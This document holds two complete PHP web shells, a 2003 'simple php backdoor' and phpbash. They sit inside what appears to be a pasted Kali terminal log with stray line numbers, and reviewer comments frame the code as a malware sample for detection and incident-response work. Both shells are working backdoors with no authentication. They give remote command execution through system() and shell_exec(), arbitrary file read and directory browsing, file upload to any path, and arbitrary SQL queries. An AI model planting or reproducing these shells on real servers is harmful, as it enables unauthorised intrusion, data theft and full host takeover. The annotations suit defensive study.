<?
// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
// NOTE(review): annotated as a malware sample for detection/IR work, code left as found.
// There is no authentication anywhere in this file: every handler below acts on
// whatever $_REQUEST (GET, POST or cookie) carries, for any client that reaches it.
// $PHP_SELF, $HTTP_POST_FILES, $SERVER_NAME and $REQUEST_URI are referenced but
// never assigned here — presumably they only resolve on register_globals-era PHP.

// Turn on implicit flushing so output (e.g. from the system() handler) is sent as it is produced.
ob_implicit_flush();
// ?f=<path>: arbitrary file read. The path is taken verbatim from the request with
// no validation and streamed back raw with the web server's privileges. The
// fopen() return value is not checked — fpassthru() is called on whatever came back.
if(isset($_REQUEST['f'])){
$filename=$_REQUEST['f'];
$file=fopen("$filename","rb");
fpassthru($file);
die;
}
// ?d=<directory>: directory listing. Every entry becomes a link back to this
// script — subdirectories via ?d=, files via ?f= (the arbitrary-read handler) —
// so anything the web server user can read is browsable. $d and $dir are echoed
// into the HTML and href attributes without escaping.
if(isset($_REQUEST['d'])){
$d=$_REQUEST['d'];
echo "<pre>";
if ($handle = opendir("$d")) {
echo "<h2>listing of $d</h2>";
while ($dir = readdir($handle)){
if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
echo "$dir\n";
echo "</font></a>";
}

} else echo "opendir() failed";
// Runs on the failure branch as well, where $handle is false.
closedir($handle);
die ("<hr>");
}
// ?c=<command>: unauthenticated remote command execution. The raw request value
// goes straight to system(), which runs it via the shell and echoes the output.
// The `c` parameter feeding system() is the primary detection indicator for this sample.
if(isset($_REQUEST['c'])){
echo "<pre>";
system($_REQUEST['c']);
die;
}
// upload=…&dir=<path> plus a multipart field `file_name`: arbitrary file write.
// The destination is $dir concatenated directly with the client-supplied original
// filename — no separator, no basename(), no extension check — so the client
// controls the final path within what the web server user can write. Reads the
// legacy $HTTP_POST_FILES array rather than $_FILES. On success there is no die,
// so execution falls through to the HTML page below.
if(isset($_REQUEST['upload'])){

if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
else $dir=$_REQUEST['dir'];
$fname=$HTTP_POST_FILES['file_name']['name'];
if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
die('file uploading error.');
}
// mquery=<sql> with host/usr/passwd/db: run an arbitrary SQL statement using
// caller-supplied credentials and dump each row with print_r(). The form driving
// this (below) submits via GET, so the DB password and the query travel in the
// URL and therefore into access logs and referers.
// $result is only tested for the success banner; the fetch loop runs regardless,
// so a failed query still calls mysql_fetch_array() on false.
// NOTE(review): relies on the mysql_* extension, which current PHP no longer ships.
if(isset($_REQUEST['mquery'])){

$host=$_REQUEST['host'];
$usr=$_REQUEST['usr'];
$passwd=$_REQUEST['passwd'];
$db=$_REQUEST['db'];
$mquery=$_REQUEST['mquery'];
mysql_connect("$host", "$usr", "$passwd") or
die("Could not connect: " . mysql_error());
mysql_select_db("$db");
$result = mysql_query("$mquery");
if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
mysql_free_result($result);
die;
}
?>
<!-- Operator UI for the handlers above. The command form and the MySQL form both
     submit via GET, so executed commands and database credentials end up in the
     query string. MAX_FILE_SIZE is only a client-side hint; the upload handler
     does not enforce any size limit. $PHP_SELF/$SERVER_NAME/$REQUEST_URI are
     echoed unescaped. -->
<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
<br>for example:
http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
<hr>execute mysql query:
<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
host:<input type="text" name="host"value="localhost"> user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">

database: <input type="text" name="db"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
</form>

<!-- http://michaeldaw.org 2006 -->
  72. root@kali:~/IDF# git clone https://github.com/Arrexel/phpbash.git
  73. Cloning into 'phpbash'...
  74. remote: Enumerating objects: 85, done.
  75. remote: Total 85 (delta 0), reused 0 (delta 0), pack-reused 85
  76. Unpacking objects: 100% (85/85), done.
  77. root@kali:~/IDF# ls
  78. Bing.url credenitals.txt decrypt.rar hash README.txt
  79. c2.pcap.rar d2.rar.rar decrypt.rar.rar new run
  80. Challenge2 d3.rar dec.txt newfile shell.php
  81. Challenge2.pcap.rar '#decrypt.py#' desktop.ini p0wny-shell WebExploitationTool
  82. classified_document.txt decrypt.py file phpbash work
  83. root@kali:~/IDF# cd ph
  84. bash: cd: ph: No such file or directory
  85. root@kali:~/IDF# cd phpbash/
  86. root@kali:~/IDF/phpbash# ls
  87. LICENSE phpbash.min.php phpbash.php README.md
  88. root@kali:~/IDF/phpbash# cat phpbash.php
<?php
/* phpbash by Alexander Reid (Arrexel) */
/*
 * NOTE(review): annotated as a sample for detection/IR work; code left as found.
 * No authentication. Two POST entry points, each serving any client that reaches the page:
 *   cmd=<shell>                -> shell_exec() with stderr merged (" 2>&1"), output
 *                                 HTML-escaped line by line and terminated with <br>.
 *   file=<upload> + path=<dir> -> move_uploaded_file() to <path>/<original filename>.
 * Any other request falls through to the HTML console below.
 */
if (ISSET($_POST['cmd'])) {
// Each output line is passed through htmlentities(ENT_QUOTES|ENT_HTML5); the
// console JS maps the resulting &sol; entities back to "/" for the paths it tracks.
$output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1"));
foreach ($output as $line) {
echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>";
}
die();
} else if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) {
// The client-supplied original filename is used verbatim (no basename() or
// extension check), joined to the caller's path; a "/" is appended unless path is "/".
$filename = $_FILES["file"]["name"];
$path = $_POST['path'];
if ($path != "/") {
$path .= "/";
}
if (move_uploaded_file($_FILES["file"]["tmp_name"], $path.$filename)) {
echo htmlentities($filename) . " successfully uploaded to " . htmlentities($path);
} else {
echo "Error uploading " . htmlentities($filename);
}
die();
}
?>
  111.  
  112. <html>
  113. <head>
  114. <title></title>
  115. <style>
  116. html, body {
  117. max-width: 100%;
  118. }
  119.  
  120. body {
  121. width: 100%;
  122. height: 100%;
  123. margin: 0;
  124. background: #000;
  125. }
  126.  
  127. body, .inputtext {
  128. font-family: "Lucida Console", "Lucida Sans Typewriter", monaco, "Bitstream Vera Sans Mono", monospace;
  129. font-size: 14px;
  130. font-style: normal;
  131. font-variant: normal;
  132. font-weight: 400;
  133. line-height: 20px;
  134. overflow: hidden;
  135. }
  136.  
  137. .console {
  138. width: 100%;
  139. height: 100%;
  140. margin: auto;
  141. position: absolute;
  142. color: #fff;
  143. }
  144.  
  145. .output {
  146. width: auto;
  147. height: auto;
  148. position: absolute;
  149. overflow-y: scroll;
  150. top: 0;
  151. bottom: 30px;
  152. left: 5px;
  153. right: 0;
  154. line-height: 20px;
  155. }
  156.  
  157. .input form {
  158. position: relative;
  159. margin-bottom: 0px;
  160. }
  161.  
  162. .username {
  163. height: 30px;
  164. width: auto;
  165. padding-left: 5px;
  166. line-height: 30px;
  167. float: left;
  168. }
  169.  
  170. .input {
  171. border-top: 1px solid #333333;
  172. width: 100%;
  173. height: 30px;
  174. position: absolute;
  175. bottom: 0;
  176. }
  177.  
  178. .inputtext {
  179. width: auto;
  180. height: 30px;
  181. bottom: 0px;
  182. margin-bottom: 0px;
  183. background: #000;
  184. border: 0;
  185. float: left;
  186. padding-left: 8px;
  187. color: #fff;
  188. }
  189.  
  190. .inputtext:focus {
  191. outline: none;
  192. }
  193.  
  194. ::-webkit-scrollbar {
  195. width: 12px;
  196. }
  197.  
  198. ::-webkit-scrollbar-track {
  199. background: #101010;
  200. }
  201.  
  202. ::-webkit-scrollbar-thumb {
  203. background: #303030;
  204. }
  205. </style>
  206. </head>
  207. <body>
  208. <div class="console">
  209. <div class="output" id="output"></div>
  210. <div class="input" id="input">
  211. <form id="form" method="GET" onSubmit="sendCommand()">
  212. <div class="username" id="username"></div>
  213. <input class="inputtext" id="inputtext" type="text" name="cmd" autocomplete="off" autofocus>
  214. </form>
  215. </div>
  216. </div>
  217. <form id="upload" method="POST" style="display: none;">
  218. <input type="file" name="file" id="filebrowser" onchange='uploadFile()' />
  219. </form>
  220. <script type="text/javascript">
// Console state. username/hostname/currentDir are filled by getShellInfo() from the
// server's reply to "whoami; hostname; pwd"; previousDir/defaultDir back the
// `cd -` and bare `cd` handling in sendCommand(). commandHistory is an in-memory
// history walked with the arrow keys via currentCommand.
var username = "";
var hostname = "";
var currentDir = "";
var previousDir = "";
var defaultDir = "";
var commandHistory = [];
var currentCommand = 0;
var inputTextElement = document.getElementById('inputtext');
var inputElement = document.getElementById("input");
var outputElement = document.getElementById("output");
var usernameElement = document.getElementById("username");
var uploadFormElement = document.getElementById("upload");
var fileBrowserElement = document.getElementById("filebrowser");
// Fingerprint the host as soon as the page loads.
getShellInfo();
  235.  
// Fingerprint the shell on page load: POSTs the fixed body "cmd=whoami; hostname; pwd"
// to the current URL, splits the <br>-separated reply into user / host / cwd and
// renders the prompt. That exact POST body is a usable network indicator for this tool.
function getShellInfo() {
var request = new XMLHttpRequest();

request.onreadystatechange = function() {
if (request.readyState == XMLHttpRequest.DONE) {
var parsedResponse = request.responseText.split("<br>");
username = parsedResponse[0];
hostname = parsedResponse[1];
// The server HTML-escapes output, so "/" arrives as &sol;; restore it for the cwd.
currentDir = parsedResponse[2].replace(new RegExp("&sol;", "g"), "/");
defaultDir = currentDir;
// Prompt is built with innerHTML from the (server-escaped) reply fragments.
usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
updateInputWidth();
}
};

// Empty URL => same page; the PHP handler dispatches on the `cmd` POST field.
request.open("POST", "", true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.send("cmd=whoami; hostname; pwd");
}
  255.  
// Submit the typed command to the server and append the result to the console.
// The server keeps no state, so the working directory is emulated here: every
// command sent is prefixed with "cd <currentDir>; " (so on the wire each request
// body starts with that prefix — a useful signature). `cd` variants append "; pwd"
// and take the first reply line as the new cwd; `clear` and `upload` never reach
// the server. Returns false so the GET form does not navigate.
function sendCommand() {
var request = new XMLHttpRequest();
var command = inputTextElement.value;
var originalCommand = command;
var originalDir = currentDir;
var cd = false;

// Record the command and reset the history cursor to "past the end".
commandHistory.push(originalCommand);
switchCommand(commandHistory.length);
inputTextElement.value = "";

var parsedCommand = command.split(" ");

if (parsedCommand[0] == "cd") {
cd = true;
if (parsedCommand.length == 1) {
// bare `cd` -> back to the directory reported at page load
command = "cd "+defaultDir+"; pwd";
} else if (parsedCommand[1] == "-") {
command = "cd "+previousDir+"; pwd";
} else {
// relative `cd` is resolved against the emulated cwd
command = "cd "+currentDir+"; "+command+"; pwd";
}

} else if (parsedCommand[0] == "clear") {
outputElement.innerHTML = "";
return false;
} else if (parsedCommand[0] == "upload") {
// Opens the hidden file picker; uploadFile() does the actual POST.
fileBrowserElement.click();
return false;
} else {
command = "cd "+currentDir+"; " + command;
}

request.onreadystatechange = function() {
if (request.readyState == XMLHttpRequest.DONE) {
if (cd) {
// First reply line is the `pwd` output (server-escaped, so &sol; -> "/").
var parsedResponse = request.responseText.split("<br>");
previousDir = currentDir;
currentDir = parsedResponse[0].replace(new RegExp("&sol;", "g"), "/");
// NOTE(review): originalCommand/originalDir are inserted via innerHTML unescaped;
// only the server's responseText is HTML-escaped.
outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+originalDir+"# "+originalCommand+"</div><br>";
usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
} else {
// Trailing "<br><br>" (empty last line from preg_split) is collapsed to one "<br>".
outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# "+originalCommand+"</div><br>" + request.responseText.replace(new RegExp("<br><br>$"), "<br>");
outputElement.scrollTop = outputElement.scrollHeight;
}
updateInputWidth();
}
};

request.open("POST", "", true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.send("cmd="+encodeURIComponent(command));
return false;
}
  310.  
// Upload the file chosen in the hidden picker to the emulated cwd: multipart POST
// with fields `file` (the file, original name preserved) and `path` (currentDir),
// handled by the move_uploaded_file() branch in the PHP above. The server's reply
// is appended to the console as-is; the local filename is inserted unescaped.
function uploadFile() {
var formData = new FormData();
formData.append('file', fileBrowserElement.files[0], fileBrowserElement.files[0].name);
formData.append('path', currentDir);

var request = new XMLHttpRequest();

request.onreadystatechange = function() {
if (request.readyState == XMLHttpRequest.DONE) {
outputElement.innerHTML += request.responseText+"<br>";
}
};

// No Content-Type header: the browser sets the multipart boundary for FormData.
request.open("POST", "", true);
request.send(formData);
outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# Uploading "+fileBrowserElement.files[0].name+"...</div><br>";
}
  328.  
// Size the input box to the space left beside the prompt.
// NOTE(review): the computed number is assigned to style.width without a CSS unit.
function updateInputWidth() {
inputTextElement.style.width = inputElement.clientWidth - usernameElement.clientWidth - 15;
}
  332.  
// Page-wide key handler: arrow keys walk the command history.
document.onkeydown = checkForArrowKeys;
  334.  
// Map Up (38) / Down (40) to history navigation; other keys are ignored.
// keyCode is compared loosely against string literals, which matches numerically.
function checkForArrowKeys(e) {
e = e || window.event;

if (e.keyCode == '38') {
previousCommand();
} else if (e.keyCode == '40') {
nextCommand();
}
}
  344.  
// Step one entry back in commandHistory, stopping at the oldest entry.
function previousCommand() {
if (currentCommand != 0) {
switchCommand(currentCommand-1);
}
}
  350.  
// Step one entry forward; commandHistory.length is the "empty input" position.
function nextCommand() {
if (currentCommand != commandHistory.length) {
switchCommand(currentCommand+1);
}
}
  356.  
// Move the history cursor to newCommand and load that entry into the input.
// An index equal to commandHistory.length clears the input (the "new command" slot).
function switchCommand(newCommand) {
currentCommand = newCommand;

if (currentCommand == commandHistory.length) {
inputTextElement.value = "";
} else {
inputTextElement.value = commandHistory[currentCommand];
// Deferred so the caret lands at the end after the value is set.
setTimeout(function(){ inputTextElement.selectionStart = inputTextElement.selectionEnd = 10000; }, 0);
}
}
  367.  
// Belt-and-braces: the form's onSubmit="sendCommand()" already returns false, and
// this listener also cancels the default GET submission so the page never navigates.
document.getElementById("form").addEventListener("submit", function(event){
event.preventDefault()
});
  371. </script>
  372. </body>
  373. </html>